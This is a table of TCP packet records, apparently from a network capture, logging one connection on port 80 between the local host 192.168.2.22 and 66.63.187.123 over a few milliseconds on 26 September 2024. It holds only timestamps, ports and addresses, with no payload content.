Sep 26, 2024 09:19:23.057809114 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057842970 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057857990 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057890892 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057904005 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057929039 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057933092 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057961941 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057969093 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.058000088 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.058003902 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.058038950 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.058748007 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.058798075 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.058801889 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.058842897 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.058845043 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.058892012 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.058898926 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.058937073 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.058947086 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.058971882 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.058979034 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059009075 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059010983 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059055090 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059061050 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059098005 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059108019 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059130907 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059135914 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059166908 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059176922 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059200048 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059232950 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059242964 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059251070 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059281111 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059283972 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059318066 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059329033 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059351921 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059355974 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059402943 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059767008 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059782982 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059799910 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059812069 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059828997 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059837103 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059868097 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059885025 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059900999 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059910059 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059919119 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.059925079 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059942007 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.059957981 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060012102 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060026884 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060044050 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060055971 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060060978 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060070992 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060081005 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060096025 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060101986 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060133934 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060669899 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060687065 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060704947 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060718060 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060745001 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060745001 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060784101 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060801029 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060817003 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060827971 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060836077 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060841084 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060854912 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060870886 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060930014 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060945988 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060961962 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060971975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.060977936 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.060986042 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061000109 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061002016 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061013937 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061037064 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061589956 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061605930 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061623096 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061635971 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061664104 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061664104 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061700106 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061717987 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061733961 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061742067 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061752081 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061759949 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061773062 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061786890 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061814070 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061830044 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061846972 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.061856031 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061870098 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.061882019 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062403917 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062449932 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062455893 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062488079 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062530041 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062572956 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062582970 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062599897 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062621117 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062634945 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062634945 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062675953 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062691927 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062707901 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062736034 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062748909 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062783957 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062824011 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062833071 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062874079 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062911987 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062930107 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062957048 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062964916 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.062968969 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.062987089 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063000917 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063021898 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063085079 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063128948 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063162088 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063180923 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063204050 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063218117 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063236952 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063273907 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063332081 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063349962 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063366890 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063410044 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063410044 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063410044 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063450098 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063467026 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063483953 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063488007 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063502073 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063502073 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063529015 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063543081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063605070 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063606024 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063630104 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063647985 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063652039 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063664913 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063666105 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063679934 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063684940 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063700914 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063714981 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063719034 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.063739061 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063754082 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.063811064 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064053059 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064093113 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064097881 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064132929 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064191103 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064205885 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064224005 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064234972 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064248085 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064260960 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064291954 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064308882 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064326048 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064332008 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064343929 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064346075 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064363956 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064383030 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064424038 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064440012 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064457893 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064467907 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064482927 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064491987 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064522982 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064538956 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064554930 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064562082 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064572096 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064578056 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064589977 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064591885 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064609051 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064619064 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064625978 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064630985 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064646006 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064663887 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064759016 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064802885 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064842939 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064861059 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064877987 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064886093 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064894915 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064898968 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064912081 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064913034 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064929962 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.064930916 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064944983 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.064961910 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065095901 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065112114 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065129042 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065140009 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065156937 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065165043 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065243006 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065259933 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065277100 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065284967 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065294981 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065299034 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065310955 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065325975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065399885 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065428019 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065443039 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065443993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065457106 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065460920 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065476894 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065479040 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065493107 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065494061 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065509081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065511942 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065524101 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065529108 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065545082 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065546989 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065562010 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065577984 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065642118 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065764904 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065781116 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065797091 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065805912 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065814972 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065831900 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065839052 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065849066 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065853119 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065865993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065871000 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065882921 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065885067 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065898895 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065901041 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.065915108 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.065937042 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066128016 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066143036 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066159964 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066171885 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066189051 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066196918 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066225052 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066241026 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066257954 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066265106 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066277981 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066277981 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066293955 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066312075 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066396952 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066412926 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066430092 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066441059 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066447020 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066452026 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066464901 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066466093 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066479921 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066502094 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066565037 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066592932 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066606998 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066621065 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066628933 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066637993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066654921 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066658020 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066672087 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066673040 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066687107 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066690922 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066703081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066706896 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066724062 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066725969 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066740036 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066741943 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066757917 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066780090 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066826105 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066911936 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066926956 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066943884 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066957951 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066961050 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066971064 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066982031 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.066982985 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.066998959 CEST	49161	80	192.168.2.22	66.63.187.123
